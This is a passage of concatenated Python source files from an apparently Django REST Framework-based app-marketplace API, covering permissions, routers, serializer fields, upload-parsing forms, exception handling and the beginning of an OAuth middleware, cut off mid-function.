    """Base for flag()/switch()-generated permissions; subclasses provide
    `type` ('flag' or 'switch') and `name`."""

    def has_permission(self, request, view):
        if self.type == 'flag':
            return flag_is_active(request, self.name)
        if self.type == 'switch':
            return switch_is_active(self.name)
        raise NotImplementedError

    def has_object_permission(self, request, view, obj):
        return self.has_permission(request, view)
class GroupPermission(BasePermission):
    """Gate access on an ACL (app, action) pair, e.g. ('Apps', 'Review')."""

    def __init__(self, app, action):
        self.app = app
        self.action = action

    def has_permission(self, request, view):
        return acl.action_allowed(request, self.app, self.action)

    def has_object_permission(self, request, view, obj):
        return self.has_permission(request, view)

    def __call__(self, *a):
        """
        ignore DRF's nonsensical need to call this object.
        """
        return self
class ByHttpMethod(BasePermission):
    """Dispatch to a different permission depending on the HTTP method.

    `method_permissions` maps lowercase HTTP method names to permission
    classes (uninstantiated, as DRF expects them). Methods not listed fall
    back to `default` (AllowNone unless given). On a CORS-enabled endpoint
    you probably want to map 'options' to AllowAny.
    """

    def __init__(self, method_permissions, default=None):
        fallback = default if default is not None else AllowNone()
        self.method_permissions = defaultdict(lambda: fallback)
        for method, perm in method_permissions.items():
            # Instantiate the permissions, as DRF itself would.
            self.method_permissions[method] = perm()

    def _permission_for(self, request):
        # One-line helper: pick the permission matching the request method.
        return self.method_permissions[request.method.lower()]

    def has_permission(self, request, view):
        return self._permission_for(request).has_permission(request, view)

    def has_object_permission(self, request, view, obj):
        return self._permission_for(request).has_object_permission(
            request, view, obj)

    def __call__(self):
        return self
########NEW FILE########
__FILENAME__ = base
import functools
import json
from django.db.models.sql import EmptyResultSet
import commonware.log
from rest_framework.decorators import api_view
from rest_framework.exceptions import ParseError
from rest_framework.mixins import ListModelMixin
from rest_framework.routers import Route, SimpleRouter
from rest_framework.response import Response
from rest_framework.urlpatterns import format_suffix_patterns
import mkt
log = commonware.log.getLogger('z.api')
def list_url(name, **kw):
    """Return an ('api_dispatch_list', kwargs) pair for resource `name`."""
    kw.update(resource_name=name)
    return ('api_dispatch_list', kw)
def get_url(name, pk, **kw):
    """Return an ('api_dispatch_detail', kwargs) pair for `name`/`pk`."""
    kw['resource_name'] = name
    kw['pk'] = pk
    return ('api_dispatch_detail', kw)
def _collect_form_errors(forms):
errors = {}
if not isinstance(forms, list):
forms = [forms]
for f in forms:
# If we've got form objects, get the error object off it.
# Otherwise assume we've just been passed a form object.
form_errors = getattr(f, 'errors', f)
if isinstance(form_errors, list): # Cope with formsets.
for e in form_errors:
errors.update(e)
continue
errors.update(dict(form_errors.items()))
return errors
def form_errors(forms):
    """Raise a ParseError carrying the combined errors of `forms`."""
    raise ParseError(_collect_form_errors(forms))
def check_potatocaptcha(data):
    """Honeypot check: return a 400 Response if a bot filled the form.

    Returns None when the submission looks human ('tuber' left empty and
    'sprout' set to the expected value).
    """
    if data.get('tuber'):
        return Response(json.dumps({'tuber': 'Invalid value'}), 400)
    if data.get('sprout') != 'potato':
        return Response(json.dumps({'sprout': 'Invalid value'}), 400)
class SubRouter(SimpleRouter):
    """
    Like SimpleRouter, but with the lookup before the prefix, so that it can be
    easily used for sub-actions that are children of a main router.

    This is a convenient way of linking one or more viewsets to a parent one
    without having to set multiple @action and @link manually.
    """
    # NOTE(review): both routes use the same URL regex and differ only in
    # their method mapping -- presumably intentional for singleton
    # sub-resources; confirm before changing.
    routes = [
        # List route.
        Route(
            url=r'^{lookup}/{prefix}{trailing_slash}$',
            mapping={
                'get': 'list',
                'post': 'create'
            },
            name='{basename}-list',
            initkwargs={'suffix': 'List'}
        ),
        # Detail route.
        Route(
            url=r'^{lookup}/{prefix}{trailing_slash}$',
            mapping={
                'get': 'retrieve',
                'put': 'update',
                'post': 'detail_post',
                'patch': 'partial_update',
                'delete': 'destroy'
            },
            name='{basename}-detail',
            initkwargs={'suffix': 'Instance'}
        )
    ]
class SubRouterWithFormat(SubRouter):
    """SubRouter that also exposes `.format`-suffixed URL patterns.

    Similar to DRF's DefaultRouter, but the format variants always omit the
    trailing slash regardless of `trailing_slash`, to avoid ugly URLs like
    `/foo/.json/`.
    """

    def get_urls(self):
        base_urls = super(SubRouterWithFormat, self).get_urls()
        # Temporarily drop the trailing slash to build the format variants,
        # then restore it.
        saved_slash = self.trailing_slash
        self.trailing_slash = ''
        format_urls = super(SubRouterWithFormat, self).get_urls()
        self.trailing_slash = saved_slash
        return base_urls + format_suffix_patterns(format_urls,
                                                 suffix_required=True)
class MarketplaceView(object):
    """
    Base view for DRF views.

    It includes:
    - An implementation of handle_exception() that goes with our custom
      exception handler. It stores the request and originating class in the
      exception before it's handed over to the handler, so that the handler
      can in turn properly propagate the got_request_exception signal if
      necessary.
    - An implementation of paginate_queryset() that goes with our custom
      pagination handler. It does tastypie-like offset pagination instead of
      the default page mechanism.
    """
    def handle_exception(self, exc):
        # Stash context for custom_exception_handler so it can fire
        # got_request_exception with the real request/view class.
        exc._request = self.request._request
        exc._klass = self.__class__
        return super(MarketplaceView, self).handle_exception(exc)

    def paginate_queryset(self, queryset, page_size=None):
        page_query_param = self.request.QUERY_PARAMS.get(self.page_kwarg)
        offset_query_param = self.request.QUERY_PARAMS.get('offset')

        # If 'offset' (tastypie-style pagination) parameter is present and
        # 'page' isn't, use offset to find which page to use.
        if page_query_param is None and offset_query_param is not None:
            # Explicit floor division so the result stays an int under both
            # Python 2 and Python 3 (plain `/` would yield a float on py3).
            page_number = int(offset_query_param) // self.get_paginate_by() + 1
            self.kwargs[self.page_kwarg] = page_number
        return super(MarketplaceView, self).paginate_queryset(queryset,
            page_size=page_size)

    def get_region_from_request(self, request):
        """
        Return the REGION object for the passed request. If the GET param
        `region` is `'None'`, return `None`. Otherwise, return
        `request.REGION`, which will have been set by the RegionMiddleware.
        If we somehow didn't go through the middleware and request.REGION is
        absent, fall back to RESTOFWORLD.
        """
        if request.GET.get('region') == 'None':
            return None
        return getattr(request, 'REGION', mkt.regions.RESTOFWORLD)
class CORSMixin(object):
    """
    Mixin to enable CORS for DRF API.
    """
    def finalize_response(self, request, response, *args, **kwargs):
        # The CORS middleware reads `CORS` off the underlying request; only
        # set it if nothing else (e.g. a decorator) already did.
        if not hasattr(request._request, 'CORS'):
            request._request.CORS = self.cors_allowed_methods
        return super(CORSMixin, self).finalize_response(
            request, response, *args, **kwargs)
def cors_api_view(methods):
    """Combine DRF's @api_view(methods) with CORS-enabling those methods."""
    def decorator(f):
        @api_view(methods)
        @functools.wraps(f)
        def wrapped(request):
            # Mark the underlying request for the CORS middleware.
            request._request.CORS = methods
            return f(request)
        return wrapped
    return decorator
class SlugOrIdMixin(object):
    """Let URLs pass a slug where a pk is normally expected.

    Works with any router/urlpattern using a relaxed pk regexp such as
    (?P<pk>[^/]+) (DRF's default). Override `self.slug_field` if the slug
    field is named differently.
    """

    def get_object(self, queryset=None):
        pk = self.kwargs.get('pk')
        # Any non-numeric identifier is treated as a slug.
        if pk and not pk.isdigit():
            self.kwargs.update(pk=None, slug=pk)
        return super(SlugOrIdMixin, self).get_object(queryset=queryset)
class SilentListModelMixin(ListModelMixin):
    """ListModelMixin that answers an empty list instead of a 404/500."""

    def list(self, *args, **kwargs):
        try:
            response = super(SilentListModelMixin, self).list(*args, **kwargs)
        except EmptyResultSet:
            # e.g. a filter that can never match anything.
            return Response([])
        return Response([]) if response.status_code == 404 else response
########NEW FILE########
__FILENAME__ = exceptions
from django.conf import settings
from django.core.signals import got_request_exception
from rest_framework import status
from rest_framework.exceptions import APIException
from rest_framework.response import Response
from rest_framework.views import exception_handler
class AlreadyPurchased(Exception):
    """Raised when a user attempts to purchase an app they already own."""
    pass
class Conflict(APIException):
    """API exception rendered as HTTP 409 Conflict."""
    status_code = status.HTTP_409_CONFLICT
    default_detail = 'Conflict detected.'

    def __init__(self, detail=None):
        # Falsy detail falls back to the default message.
        self.detail = detail or self.default_detail
class NotImplemented(APIException):
    """API exception rendered as HTTP 501 Not Implemented.

    NOTE: the name shadows the `NotImplemented` builtin within this module;
    kept as-is because external callers import it by this name.
    """
    status_code = status.HTTP_501_NOT_IMPLEMENTED
    default_detail = 'API not implemented.'

    def __init__(self, detail=None):
        # Falsy detail falls back to the default message.
        self.detail = detail or self.default_detail
class ServiceUnavailable(APIException):
    """API exception rendered as HTTP 503 Service Unavailable."""
    status_code = status.HTTP_503_SERVICE_UNAVAILABLE
    default_detail = 'Service unavailable at this time.'

    def __init__(self, detail=None):
        # Falsy detail falls back to the default message.
        self.detail = detail or self.default_detail
def custom_exception_handler(exc):
    """
    Custom exception handler for DRF, which doesn't provide one for HTTP
    responses like tastypie does.
    """
    # If propagate is true, bail early.
    if settings.DEBUG_PROPAGATE_EXCEPTIONS:
        # Bare `raise` re-raises the exception currently being handled --
        # this handler is invoked from inside DRF's except block.
        raise
    # Call REST framework's default exception handler first,
    # to get the standard error response.
    response = exception_handler(exc)
    # If the response is None, then DRF didn't handle the exception and we
    # should do it ourselves.
    if response is None:
        # Start with a generic default error message.
        data = {"detail": "Internal Server Error"}
        # Include traceback if API_SHOW_TRACEBACKS is active.
        if getattr(settings, 'API_SHOW_TRACEBACKS', settings.DEBUG):
            import traceback
            import sys
            data['error_message'] = unicode(exc)
            data['traceback'] = '\n'.join(
                traceback.format_exception(*(sys.exc_info())))
        # _request/_klass were stashed by MarketplaceView.handle_exception;
        # they may be absent when the exception came from elsewhere.
        request = getattr(exc, '_request', None)
        klass = getattr(exc, '_klass', None)
        # Send the signal so other apps are aware of the exception.
        got_request_exception.send(klass, request=request)
        # Send the 500 response back.
        response = Response(data, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    return response
class HttpLegallyUnavailable(APIException):
    """API exception rendered as HTTP 451 Unavailable For Legal Reasons."""
    status_code = 451
    default_detail = 'Legally unavailable.'

    def __init__(self, detail=None):
        # Falsy detail falls back to the default message.
        self.detail = detail or self.default_detail
########NEW FILE########
__FILENAME__ = fields
from django.conf import settings
from django.core import validators
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db.models.fields import BLANK_CHOICE_DASH
from django.utils.translation import ugettext_lazy as _
from rest_framework import fields, serializers
from rest_framework.compat import smart_text
from amo.utils import to_language
class MultiSlugChoiceField(fields.WritableField):
    """
    Like SlugChoiceField but accepts a list of values rather a single one.
    """
    type_name = 'MultiSlugChoiceField'
    type_label = 'multiple choice'
    default_error_messages = {
        'invalid_choice': _('Select a valid choice. %(value)s is not one of '
                            'the available choices.'),
    }

    def __init__(self, choices_dict=None, *args, **kwargs):
        super(MultiSlugChoiceField, self).__init__(*args, **kwargs)
        # Create a choice dynamically to allow None, slugs and ids. Also store
        # choices_dict and ids_choices_dict to re-use them later in to_native()
        # and from_native().
        self.choices_dict = choices_dict
        slugs_choices = self.choices_dict.items()
        ids_choices = [(v.id, v) for v in self.choices_dict.values()]
        self.ids_choices_dict = dict(ids_choices)
        self.choices = slugs_choices + ids_choices
        if not self.required:
            self.choices = BLANK_CHOICE_DASH + self.choices

    def validate(self, value):
        """
        Validates that the input is in self.choices.
        """
        super(MultiSlugChoiceField, self).validate(value)
        # `value` is a list here; every item must be a valid choice.
        for v in value:
            if not self.valid_value(v):
                raise ValidationError(self.error_messages['invalid_choice'] % {
                    'value': v})

    def valid_value(self, value):
        """
        Check to see if the provided value is a valid choice.
        """
        for k, v in self.choices:
            if isinstance(v, (list, tuple)):
                # This is an optgroup, so look inside the group for options
                for k2, v2 in v:
                    if value == smart_text(k2):
                        return True
            else:
                # Compare both the text form and the raw key, so int ids
                # and string slugs both match.
                if value == smart_text(k) or value == k:
                    return True
        return False

    def from_native(self, value):
        # Normalize empty input ('', None, [], ...) to None.
        if value in validators.EMPTY_VALUES:
            return None
        return super(MultiSlugChoiceField, self).from_native(value)
class TranslationSerializerField(fields.WritableField):
    """
    Django-rest-framework custom serializer field for our TranslatedFields.

    - When deserializing, in `from_native`, it accepts both a string or a
      dictionary. If a string is given, it'll be considered to be in the
      default language.
    - When serializing, its behavior depends on the parent's serializer
      context: if a request was included, its method is 'GET' and a 'lang'
      parameter was passed, then only one translation is returned (letting
      the TranslatedField figure out automatically which language to use).
      Else, a dict with all translations for the given `field_name` on
      `obj` is returned, with languages as the keys.
    """
    default_error_messages = {
        'min_length': _('The field must have a length of at least {num} '
                        'characters.'),
    }

    def __init__(self, *args, **kwargs):
        self.min_length = kwargs.pop('min_length', None)
        super(TranslationSerializerField, self).__init__(*args, **kwargs)
        # Default to return all translations for each field.
        self.requested_language = None

    def initialize(self, parent, field_name):
        super(TranslationSerializerField, self).initialize(parent, field_name)
        request = self.context.get('request', None)
        if request and request.method == 'GET' and 'lang' in request.GET:
            # A specific language was requested, we will only return one
            # translation per field.
            self.requested_language = request.GET['lang']

    def fetch_all_translations(self, obj, source, field):
        # All rows sharing the Translation id are the available locales.
        translations = field.__class__.objects.filter(id=field.id,
                                                      localized_string__isnull=False)
        return dict((to_language(trans.locale), unicode(trans))
                    for trans in translations) if translations else None

    def fetch_single_translation(self, obj, source, field):
        # The TranslatedField itself resolves which locale to use.
        return unicode(field) if field else None

    def field_to_native(self, obj, field_name):
        source = self.source or field_name
        value = obj
        # Walk dotted sources ('a.b.c') down to the actual field.
        for component in source.split('.'):
            value = fields.get_component(value, component)
            if value is None:
                break
        field = value
        if field is None:
            return None
        if self.requested_language:
            return self.fetch_single_translation(obj, source, field)
        else:
            return self.fetch_all_translations(obj, source, field)

    def from_native(self, data):
        # Accept a plain string (default language) or a lang -> string dict.
        if isinstance(data, basestring):
            return data.strip()
        elif isinstance(data, dict):
            for key, value in data.items():
                data[key] = value.strip()
            return data
        data = super(TranslationSerializerField, self).from_native(data)
        return unicode(data)

    def validate(self, value):
        super(TranslationSerializerField, self).validate(value)
        if self.min_length is None:
            return
        # For a dict input, a single long-enough translation is sufficient.
        raise_error = True
        if isinstance(value, basestring):
            if len(value.strip()) >= self.min_length:
                raise_error = False
        else:
            for k, v in value.items():
                if len(v.strip()) >= self.min_length:
                    raise_error = False
                    break
        if raise_error:
            raise ValidationError(
                self.error_messages['min_length'].format(num=self.min_length))
class ESTranslationSerializerField(TranslationSerializerField):
    """
    Like TranslationSerializerField, but fetching the data from a dictionary
    built from ES data that we previously attached on the object.
    """
    # Suffix of the attribute holding the pre-attached translations dict.
    suffix = '_translations'

    def __init__(self, *args, **kwargs):
        if kwargs.get('source'):
            kwargs['source'] = '%s%s' % (kwargs['source'], self.suffix)
        super(ESTranslationSerializerField, self).__init__(*args, **kwargs)

    @classmethod
    def attach_translations(cls, obj, data, source_name, target_name=None):
        """
        Look for the translation of `source_name` in `data` and create a dict
        with all translations for this field (which will look like
        {'en-US': 'mytranslation'}) and attach it to a property on `obj`.

        The property name is built with `target_name` and `cls.suffix`. If
        `target_name` is None, `source_name` is used instead.

        The suffix is necessary for two reasons:
        1) The translations app won't let us set the dict on the real field
           without making db queries
        2) This also exactly matches how we store translations in ES, so we
           can directly fetch the translations in the data passed to this
           method.
        """
        if target_name is None:
            target_name = source_name
        target_key = '%s%s' % (target_name, cls.suffix)
        source_key = '%s%s' % (source_name, cls.suffix)
        # ES stores translations as a list of {'lang': ..., 'string': ...}.
        setattr(obj, target_key, dict((v.get('lang', ''), v.get('string', ''))
                                      for v in data.get(source_key, {}) or {}))

    def fetch_all_translations(self, obj, source, field):
        # `field` already is the attached lang -> string dict.
        return field or None

    def fetch_single_translation(self, obj, source, field):
        # Prefer the requested language, then the object's default locale,
        # then the site-wide language.
        translations = self.fetch_all_translations(obj, source, field) or {}
        return (translations.get(self.requested_language) or
                translations.get(obj.default_locale) or
                translations.get(settings.LANGUAGE_CODE) or None)

    def field_to_native(self, obj, field_name):
        if field_name:
            field_name = '%s%s' % (field_name, self.suffix)
        return super(ESTranslationSerializerField, self).field_to_native(obj,
            field_name)
class SplitField(fields.Field):
    """
    A field composed of two separate fields: one used for input, and another
    used for output. Most commonly used to accept a primary key for input and
    use a full serializer for output.

    Example usage:

        app = SplitField(PrimaryKeyRelatedField(), AppSerializer())
    """
    label = None

    def __init__(self, input, output, **kwargs):
        # NOTE(review): deliberately does not call fields.Field.__init__ --
        # presumably so the input field's configuration stays authoritative;
        # confirm before changing.
        self.input = input
        self.output = output
        self.source = input.source
        self._read_only = False

    def initialize(self, parent, field_name):
        """
        Update the context of the input and output fields to match the context
        of this field.
        """
        super(SplitField, self).initialize(parent, field_name)
        for field in [self.input, self.output]:
            if hasattr(field, 'context'):
                field.context.update(self.context)

    def get_read_only(self):
        return self._read_only

    def set_read_only(self, val):
        # Keep the wrapped input/output fields in sync.
        self._read_only = val
        self.input.read_only = val
        self.output.read_only = val

    read_only = property(get_read_only, set_read_only)

    def field_from_native(self, data, files, field_name, into):
        # Deserialization is delegated entirely to the input field.
        self.input.initialize(parent=self.parent, field_name=field_name)
        self.input.field_from_native(data, files, field_name, into)

    def field_to_native(self, obj, field_name):
        # Serialization is delegated entirely to the output field.
        self.output.initialize(parent=self.parent, field_name=field_name)
        return self.output.field_to_native(obj, field_name)
class SlugOrPrimaryKeyRelatedField(serializers.RelatedField):
    """
    Combines SlugRelatedField and PrimaryKeyRelatedField. Takes a
    `render_as` argument (either "pk" or "slug") to indicate how to
    serialize.
    """
    default_error_messages = serializers.SlugRelatedField.default_error_messages
    read_only = False

    def __init__(self, *args, **kwargs):
        self.render_as = kwargs.pop('render_as', 'pk')
        if self.render_as not in ['pk', 'slug']:
            raise ValueError("'render_as' must be one of 'pk' or 'slug', "
                             "not %r" % (self.render_as,))
        self.slug_field = kwargs.pop('slug_field', 'slug')
        super(SlugOrPrimaryKeyRelatedField, self).__init__(
            *args, **kwargs)

    def to_native(self, obj):
        if self.render_as == 'slug':
            return getattr(obj, self.slug_field)
        else:
            return obj.pk

    def from_native(self, data):
        """Resolve `data` as a pk first, then fall back to a slug lookup.

        Raises ValidationError when neither lookup matches.
        """
        if self.queryset is None:
            raise Exception('Writable related fields must include a `queryset` '
                            'argument')
        try:
            return self.queryset.get(pk=data)
        # Fix: was a bare `except:`, which also swallowed KeyboardInterrupt
        # and SystemExit. A failed pk lookup raises DoesNotExist, or
        # ValueError/TypeError when `data` isn't coercible to the pk type
        # (e.g. it's a slug string).
        except (ObjectDoesNotExist, ValueError, TypeError):
            try:
                return self.queryset.get(**{self.slug_field: data})
            except ObjectDoesNotExist:
                msg = self.error_messages['does_not_exist'] % (
                    'pk_or_slug', smart_text(data))
                raise ValidationError(msg)
class ReverseChoiceField(serializers.ChoiceField):
    """ChoiceField speaking the human-readable side of `choices_dict`.

    Serialization maps actual values to their human-readable counterparts,
    de-serialization does the reverse. The values in the choices_dict passed
    must be unique.
    """

    def __init__(self, *args, **kwargs):
        self.choices_dict = kwargs.pop('choices_dict')
        kwargs['choices'] = self.choices_dict.items()
        self.reversed_choices_dict = dict(
            (human, actual) for actual, human in self.choices_dict.items())
        super(ReverseChoiceField, self).__init__(*args, **kwargs)

    def to_native(self, value):
        # actual -> human-readable when serializing.
        human = self.choices_dict.get(value, None)
        return super(ReverseChoiceField, self).to_native(human)

    def from_native(self, value):
        # human-readable -> actual when de-serializing.
        actual = self.reversed_choices_dict.get(value, None)
        return super(ReverseChoiceField, self).from_native(actual)
class SlugChoiceField(serializers.ChoiceField):
    """
    Companion to SlugChoiceFilter: accepts an id or a slug when
    de-serializing, but always emits a slug when serializing.

    Must be initialized with `choices_dict`, mapping slugs to objects
    that expose `id` and `slug` properties; the underlying choices are
    rebuilt from it. Values in `choices_dict` must be unique.
    """
    def __init__(self, *args, **kwargs):
        # Accept both slugs and ids as valid choices, and keep both
        # mappings around for to_native()/from_native() below.
        self.choices_dict = kwargs.pop('choices_dict')
        by_slug = self.choices_dict.items()
        by_id = [(obj.id, obj) for obj in self.choices_dict.values()]
        self.ids_choices_dict = dict(by_id)
        kwargs['choices'] = by_slug + by_id
        return super(SlugChoiceField, self).__init__(*args, **kwargs)

    def metadata(self):
        """Return metadata about the choices, using each choice's name.

        Choice values here are objects, not strings, so the default
        metadata would not serialize; this keeps OPTIONS responses
        working (bug 984899).
        """
        data = super(SlugChoiceField, self).metadata()
        data['choices'] = [{'value': value,
                            'display_name': unicode(getattr(obj, 'name', obj))}
                           for value, obj in self.choices]
        return data

    def to_native(self, value):
        # Translate an id into its slug before serializing.
        if value:
            match = self.ids_choices_dict.get(value, None)
            if match is not None:
                value = match.slug
        return super(SlugChoiceField, self).to_native(value)

    def from_native(self, value):
        # Translate a slug into its id before de-serializing.
        if isinstance(value, basestring):
            match = self.choices_dict.get(value, None)
            if match is not None:
                value = match.id
        return super(SlugChoiceField, self).from_native(value)
class SlugModelChoiceField(serializers.PrimaryKeyRelatedField):
    """PrimaryKeyRelatedField that serializes to the related object's
    slug and accepts either a slug or a primary key on input."""

    def field_to_native(self, obj, field_name):
        source = self.source or field_name
        related = getattr(obj, source)
        return getattr(related, 'slug', None)

    def from_native(self, data):
        # Strings are resolved as slugs into pks before delegating.
        if isinstance(data, basestring):
            try:
                data = self.queryset.only('pk').get(slug=data).pk
            except ObjectDoesNotExist:
                msg = self.error_messages['does_not_exist'] % smart_text(data)
                raise serializers.ValidationError(msg)
        return super(SlugModelChoiceField, self).from_native(data)
class LargeTextField(serializers.HyperlinkedRelatedField):
    """
    Accepts a value for a field when unserializing, but serializes as
    a link to a separate resource. Used for text too long for common
    inclusion in a resource.
    """
    def field_to_native(self, obj, field_name):
        # Serialize as a hyperlink to the object itself rather than
        # embedding the (large) text inline.
        return self.to_native(obj)

    def from_native(self, value):
        # Incoming text is accepted verbatim.
        return value
class SemiSerializerMethodField(serializers.SerializerMethodField):
    """
    Field serialized via a method on the serializer, but whose
    deserialization is handled manually: the raw incoming value (or
    None when absent) is passed straight through.
    """
    def field_from_native(self, data, files, field_name, into):
        into[field_name] = data.get(field_name)
########NEW FILE########
__FILENAME__ = forms
import base64
import StringIO
from django import forms
from django.core.validators import URLValidator
from django.core.exceptions import ValidationError
import happyforms
from tower import ugettext_lazy as _lazy
import amo
from addons.models import Category
from mkt.developers.forms import JSONField, NewPackagedAppForm
from mkt.developers.utils import check_upload
class SluggableModelChoiceField(forms.ModelChoiceField):
    """
    A model choice field that accepts either a slug or a pk and adapts
    itself based on the value. Requires `sluggable_to_field_name`: the
    model field the slug lookup goes against.
    """
    def __init__(self, *args, **kw):
        if 'sluggable_to_field_name' not in kw:
            raise ValueError('sluggable_to_field_name is required.')
        self.sluggable_to_field_name = kw.pop('sluggable_to_field_name')
        return super(SluggableModelChoiceField, self).__init__(*args, **kw)

    def to_python(self, value):
        # Non-numeric strings are slugs: switch the lookup field before
        # delegating. Values without isdigit() (None, ints, model
        # instances) keep the default pk lookup.
        try:
            looks_like_slug = not value.isdigit()
        except AttributeError:
            looks_like_slug = False
        if looks_like_slug:
            self.to_field_name = self.sluggable_to_field_name
        return super(SluggableModelChoiceField, self).to_python(value)
def parse(file_, require_name=False, require_type=None):
    """
    Turn a ``{'data': <base64>, 'type': ..., 'name': ...}`` dict into a
    file-like StringIO object (with ``size`` and ``name`` attributes),
    validating the payload along the way.

    Raises forms.ValidationError when the input is not a dict, lacks
    'data'/'type', is not valid base64, or fails the optional
    `require_type` / `require_name` checks.
    """
    try:
        incomplete = not set(['data', 'type']).issubset(set(file_.keys()))
    except AttributeError:
        raise forms.ValidationError('File must be a dictionary.')
    if incomplete:
        raise forms.ValidationError('Type and data are required.')
    try:
        decoded = base64.b64decode(file_['data'])
    except TypeError:
        raise forms.ValidationError('File must be base64 encoded.')

    wrapped = StringIO.StringIO(decoded)
    wrapped.size = len(decoded)

    if require_type and file_.get('type', '') != require_type:
        raise forms.ValidationError('Type must be %s.' % require_type)
    if require_name and not file_.get('name', ''):
        raise forms.ValidationError('Name not specified.')

    wrapped.name = file_.get('name', '')
    return wrapped
class NewPackagedForm(NewPackagedAppForm):
    # Packaged-app uploads arrive as a JSON dict ({'data': <b64>,
    # 'type': ..., 'name': ...}) rather than a multipart file.
    upload = JSONField()

    def clean_upload(self):
        # Decode/validate the JSON payload into a file-like object, then
        # run the parent form's packaged-app validation on it.
        self.cleaned_data['upload'] = parse(self.cleaned_data
                                                .get('upload', {}),
                                            require_name=True,
                                            require_type='application/zip')
        return super(NewPackagedForm, self).clean_upload()
class FileJSONForm(happyforms.Form):
    """
    Base form for JSON-submitted file uploads.

    Subclasses set `upload_type` and `hash_name` (see PreviewJSONForm
    and IconJSONForm) before cleaning runs.
    """
    file = JSONField(required=True)

    def clean_file(self):
        payload = self.cleaned_data.get('file', {})
        file_obj = parse(payload)
        errors, hash_ = check_upload(file_obj, self.upload_type,
                                     payload['type'])
        if errors:
            raise forms.ValidationError(errors)
        self.hash_ = hash_
        return payload

    def clean(self):
        # Expose the computed upload hash under the subclass-chosen key.
        self.cleaned_data[self.hash_name] = getattr(self, 'hash_', None)
        return self.cleaned_data
class PreviewJSONForm(FileJSONForm):
    # Position of the preview within the app's preview list.
    position = forms.IntegerField(required=True)

    def __init__(self, *args, **kwargs):
        # Configure the base class's upload validation for previews.
        self.upload_type = 'preview'
        self.hash_name = 'upload_hash'
        super(PreviewJSONForm, self).__init__(*args, **kwargs)
class IconJSONForm(FileJSONForm):
    def __init__(self, *args, **kwargs):
        # Configure the base class's upload validation for icons.
        self.upload_type = 'icon'
        self.hash_name = 'icon_upload_hash'
        super(IconJSONForm, self).__init__(*args, **kwargs)
class CategoryForm(happyforms.Form):
    # A deliberately simple alternative to the more complicated
    # CategoryFormSet used elsewhere: just pick webapp categories.
    categories = forms.ModelMultipleChoiceField(
        queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
class CustomNullBooleanSelect(forms.Select):
    """A custom NullBooleanSelect, that uses true/false/'' values instead of
    1/2/3. See also https://code.djangoproject.com/ticket/17210."""

    def __init__(self, attrs=None):
        options = ((u'', _lazy('Unknown')),
                   (u'true', _lazy('Yes')),
                   (u'false', _lazy('No')))
        super(CustomNullBooleanSelect, self).__init__(attrs, options)

    def render(self, name, value, attrs=None, choices=()):
        # Normalize python/string booleans to the widget's string values;
        # anything else renders as "unknown".
        rendered = {True: u'true',
                    u'true': u'true',
                    False: u'false',
                    u'false': u'false'}.get(value, u'')
        return super(CustomNullBooleanSelect, self).render(name, rendered,
                                                           attrs, choices)

    def value_from_datadict(self, data, files, name):
        submitted = data.get(name, None)
        # Unrecognized values (including missing) map to None (unknown).
        return {u'true': True,
                True: True,
                'True': True,
                u'false': False,
                'False': False,
                False: False}.get(submitted, None)

    def _has_changed(self, initial, data):
        # For a CustomNullBooleanSelect, None (unknown) and False (No)
        # are *not* the same.
        if initial is not None:
            initial = bool(initial)
        if data is not None:
            data = bool(data)
        return initial != data
class SchemeURLValidator(URLValidator):
    """URLValidator that additionally restricts the allowed URI schemes.

    `schemes` defaults to http/https/ftp/ftps. Raises ValidationError
    when the value's scheme is not in the allowed list.
    """
    def __init__(self, *args, **kwargs):
        self.schemes = kwargs.pop('schemes', ['http', 'https', 'ftp', 'ftps'])
        # Bug fix: super() was previously called with URLValidator as its
        # first argument, which skipped URLValidator's own __init__ (and
        # __call__ below) and jumped straight to its base class.
        super(SchemeURLValidator, self).__init__(*args, **kwargs)

    def __call__(self, value):
        # Run the full URL validation first, then check the scheme.
        super(SchemeURLValidator, self).__call__(value)
        if not any(value.startswith(scheme + '://')
                   for scheme in self.schemes):
            raise ValidationError('Scheme should be one of {0}.'.format(
                ', '.join(self.schemes)))
########NEW FILE########
__FILENAME__ = http
from django.http import HttpResponse
class HttpPaymentRequired(HttpResponse):
    # 402 Payment Required.
    status_code = 402
class HttpTooManyRequests(HttpResponse):
    # 429 Too Many Requests (RFC 6585), used for throttled API clients.
    status_code = 429
class HttpLegallyUnavailable(HttpResponse):
    """
    451: Unavailable For Legal Reasons
    http://tools.ietf.org/html/draft-tbray-http-legally-restricted-status-00
    """
    status_code = 451
########NEW FILE########
__FILENAME__ = middleware
import hashlib
import hmac
import re
import time
from urllib import urlencode
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.cache import cache
from django.middleware.gzip import GZipMiddleware as BaseGZipMiddleware
from django.middleware.transaction import TransactionMiddleware
from django.utils.cache import patch_vary_headers
import commonware.log
from django_statsd.clients import statsd
from django_statsd.middleware import (GraphiteRequestTimingMiddleware,
TastyPieRequestTimingMiddleware)
from multidb.pinning import (pin_this_thread, this_thread_is_pinned,
unpin_this_thread)
from multidb.middleware import PinningRouterMiddleware
from mkt.api.models import Access, ACCESS_TOKEN, Token
from mkt.api.oauth import OAuthServer
from mkt.carriers import get_carrier
from users.models import UserProfile
log = commonware.log.getLogger('z.api')
class RestOAuthMiddleware(object):
    """
    OAuth 1.0 authentication for API requests, supporting both 3-legged
    (consumer + resource-owner token) and 2-legged (consumer-only)
    flows. On success it sets request.amo_user / request.user and
    appends 'RestOAuth' to request.authed_from.

    This is based on https://github.com/amrox/django-tastypie-two-legged-oauth
    with permission.
    """
    def process_request(self, request):
        # For now we only want these to apply to the API.
        # This attribute is set in RedirectPrefixedURIMiddleware.
        if not getattr(request, 'API', False):
            return
        if not settings.SITE_URL:
            raise ValueError('SITE_URL is not specified')
        # Set up authed_from attribute.
        if not hasattr(request, 'authed_from'):
            request.authed_from = []
        auth_header_value = request.META.get('HTTP_AUTHORIZATION')
        # No OAuth credentials anywhere: leave the request unauthenticated.
        if (not auth_header_value and
            'oauth_token' not in request.META['QUERY_STRING']):
            # NOTE(review): this sets .user on the *middleware* instance,
            # not on the request — looks like a bug; confirm intent.
            self.user = AnonymousUser()
            log.info('No HTTP_AUTHORIZATION header')
            return
        # Build the header dict oauthlib expects and verify the signature.
        auth_header = {'Authorization': auth_header_value}
        method = getattr(request, 'signed_method', request.method)
        oauth = OAuthServer()
        # The presence of an oauth_token distinguishes 3-legged requests.
        if ('oauth_token' in request.META['QUERY_STRING'] or
            'oauth_token' in auth_header_value):
